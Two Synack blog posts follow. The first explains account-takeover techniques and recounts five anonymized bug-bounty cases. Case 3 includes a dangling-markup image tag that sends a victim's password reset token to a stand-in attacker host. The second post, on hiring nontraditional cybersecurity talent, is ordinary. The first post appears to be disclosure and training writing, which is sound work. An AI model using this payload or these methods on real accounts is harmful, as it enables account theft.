Nikhil Srivastava is a Synack Red Team legend and co-founder of Bsides Ahmedabad.

An Account Takeover (ATO) is an attack whereby attackers take ownership of online accounts using several methods. It is unfortunately more common than you’d think, despite all the warnings to create complex passwords, avoid phishing emails and use multi-factor authentication.

Recent research shows 1 in 5 adults have suffered from an account takeover with  average financial losses of approximately $12,000. Further, PerimeterX reported that 75 to 85% of all attempted logins in the second half of 2020 were account takeover attempts. 

The Digital Shadows Research Team exposed an even more concerning statistic: more than 24 billion account usernames and passwords are available for purchase on the dark web. In some cases, purchasing credentials isn’t necessary, as year after year, the most common password is 123456, appearing in one out of every 200 passwords. 

Now that we know just how common ATOs are, let’s review some of the tactics, techniques and procedures (TTPs) used in such attacks.

Account Takeover Methodologies

• Change Email/Password CSRF – The simplest ATO employs phishing. An attacker sends a link to the victim, and when the unsuspecting user clicks on the link, the victim’s email/password will be changed and the attacker can take over their account.
• OAuth CSRF – Consider a website that allows users to log in using either a classic, password-based mechanism or by linking their account to a social media profile using OAuth. In this case, if the application fails to use the state parameter, an attacker could potentially hijack a user’s account on the client application by binding it to their own social media account.
• Default/Weak Credentials – Most products have their own default credentials for things like servers, routers, and Virtual Network Computing (VNC) that sometimes do not get changed. Many applications lack a strong password policy and will allow users to set weak passwords such as 123456.
• Forgot your password? – Sometimes “forget password” implementations can be vulnerable to password reset token leaks, HTTP leaks, bypassing poor security questions, Host header injection or HTTP Parameter Pollution attacks. 
• Credential Stuffing – In this method, attackers use lists of compromised user credentials to breach a system. Bots can be deployed for automation and scale, based on the assumption that many users reuse usernames and passwords across multiple services.

Examples of Account Takeovers

Here are five anonymized ATO case studies from a variety of industries, including healthcare, software, government and commerce. 

Case Study 1 

In the case of an American chain restaurant, I used trufflehog, a Python search tool, to review the target. While scanning the application, it produced an alert of hard-coded, JavaScript credentials. Browsing the JavaScript, I found some UPS credentials had been hard coded, as shown in the screenshot below.

Using these credentials, I was able to login into their UPS account as an admin which granted me access to sensitive information and control over their shipments.

Case Study 2

Another ATO was for a collaboration software application. While resetting the password for an admin account, I found that the application leaked their password reset token in response, as shown in the screenshot below.

Using this token, I was able to reset the admin password. Sometimes, it really is that simple. 

Case Study 3

This is a case study of a product from a medical equipment company. I tested the whole application without getting any vulnerabilities and at the end decided to check the forget password flow. While requesting the password reset token, the application sent the following request that revealed a path for me to exploit.

I used a Dangling Markup such as <img src=”http://attacker-ip/?id= in the email body before the reset link and sent it to the user. Now as soon as the user opens the email, their password reset token will be sent to me instead.

Case Study 4

The scope of this target was a wildcard and unauthenticated testing only, so I first did some reconnaissance. I found an interesting subdomain that asked for a DVN ID and password to login.

I searched about DVN IDs in help articles, and I found out it’s a 9-digit number assigned to all vendors at the time of licensing.

I did Google searches but didn’t come up with this particular ID. I ended up looking at Google images results in hope that licensing could have been done with paper and could have this ID number included.

Cool, I was correct! Licensing was done on paper and I got a couple of valid DVN IDs in the subject of letters, such as: 

Now that I had this ID, I tried brute-forcing to get a password. When that turned up nothing, I retested the “forget password” flow. It asked for the DVN ID first before resetting the password. I found that the application used two requests for resetting the password. One for querying the password for DVN ID and another one sending a newly generated password to their email ID inside the request itself.

So, this disclosed not only their password but emails too. Using the newly generated password, I was able to login into their account.

Case Study 5 

I was scanning targets for an American food and beverage company when I came across an event application. The application asked for a valid user email to login, and those company emails were whitelisted. I tried with my name@companydomain at first to see the error message and I found the following.

I noticed an email for support was given at the bottom of the page to reach out for any trouble. I thought: Why not attempt it? I entered some information and found the following screen:

The application asked to set the password, and after setting up a password, I was able to login as admin:

Further, while checking the attendee directory, I found multiple accounts that could’ve been taken over using the same method.

Conclusion 

It’s hard to believe that someone with little to no technical experience could gain the level of access that I did, but you should! Account takeovers can be complex, but they can also be relatively simple. All it takes is a bit of creativity and motivation, and just about anyone can login as an admin.

The post Account Takeovers:  Believe the Unbelievable appeared first on Synack.

Charlie Waterhouse is a senior security analyst at Synack.

One major challenge in addressing the cybersecurity talent gap centers on capability. Even when you’ve found a candidate, do they have the right skills for your organization’s tech stack or just the list of certifications from the job description? Many organizations are missing out on talent and talent augmentation because of outdated hiring practices. 

Traditional Hiring Methods Might Screen Out the Best Candidates

If you’re having a hard time finding your next cyber candidate, ask yourself: Are you filtering out the best ones? Many great candidates are screened out by hiring systems for lacking traditional requirements like a four-year degree or a certain level of experience. Sometimes, the listed expectations are not only prohibitively rare, but impossible. I’ve seen job postings ask for five years’ experience in a technology that has only been around for three—and for an entry level position at that! There are also many job postings asking for an unreasonable 5-10 years in testing and analysis experience for an associate position. 

These job description errors have two detrimental effects: First, you discourage quality candidates from applying because they doubt their qualifications are applicable. Second, experienced practitioners may dismiss your company because they view the expectations as unreasonable. 

I have met many individuals with valuable cybersecurity skills who are frustrated at not being able to even land an interview. Priorities should shift to finding a candidate with the right skills, rather than looking for a litany of degrees or certifications. Often, these titles reflect theoretical knowledge but don’t necessarily signal actual hands-on experience or skill. A candidate may lack traditional resume items, but be a driven, passionate security professional who proves to be a star in your organization. 

Education and Investing in Employee Skills

There are plenty of training resources to help individuals start an IT or security career: BUiLT, FedVTE, Love Never Fails and others educate underserved communities. At Synack, we sponsor the Synack Academy, a program to train people for cybersecurity roles and recruit them for full-time roles upon graduation. Synack also actively recruits veterans both internally and for our global Synack Red Team community of top-notch security researchers.

The candidates who benefit from these educational efforts are hungry to advance and excel, putting in hours of their own time to learn new skills. Should you turn these individuals down just because they don’t check boxes like having a four-year degree? I wouldn’t. In my view, the people who graduate from these programs are some of the best you can hire. I would also encourage employers to provide access to training to advance skills of existing employees, an affordable initiative compared to the cost of searching for and hiring new candidates.

I know firsthand how successful a nontraditional candidate can be, as I was a nontraditional hire into security. I spent more than 20 years in the airline industry before coming to Synack as a security analyst. I do not have a degree in cybersecurity or a related field, but I did have an interest and drive to learn. I spent time working on real-life security problems and focused my energy on those scenarios. For example, I worked on Hack the Box to understand network security and exploitation of websites. Today, I am routinely brought into projects or client meetings as a technical expert on securing large enterprise environments. 

Evaluating What Skills Are Needed in Full-Time Roles

Even when a candidate has enticing skills, another dilemma can arise: Is your organization able to use them? Is there enough work to justify filling a full-time role?

Security needs come and go, and sometimes temporary work is a better option than adding a full-time employee. However, managing contractors is time-consuming, and finding them is challenging in its own right. 

Synack is particularly suited to address that challenge through talent augmentation. Researchers in our Synack Red Team can perform security testing on demand. When recruiting for the SRT, we assess each candidate’s skills and vet them carefully. This makes for a community with diverse, highly-skilled researchers who can tackle any attack surface. Some have traditional four-year degrees and practitioner experience, while others hail from less traditional backgrounds. But they all have the capability to help secure your organization. 

It’s Time To Rethink Your Approach to the Cybersecurity Talent Gap

At the end of the day, there are cyber candidates out there who can help bridge the talent gap. But traditional job descriptions might be prohibitively limiting. There are education initiatives underway aimed at bringing new, passionate people to the workforce, but additional hiring challenges may remain for cyber leaders. Alternative talent augmentation, like that brought by the Synack Red Team, may be the best option. 

The post Bridging The Cyber Talent Gap: Removing Barriers for Nontraditional Talent appeared first on Synack.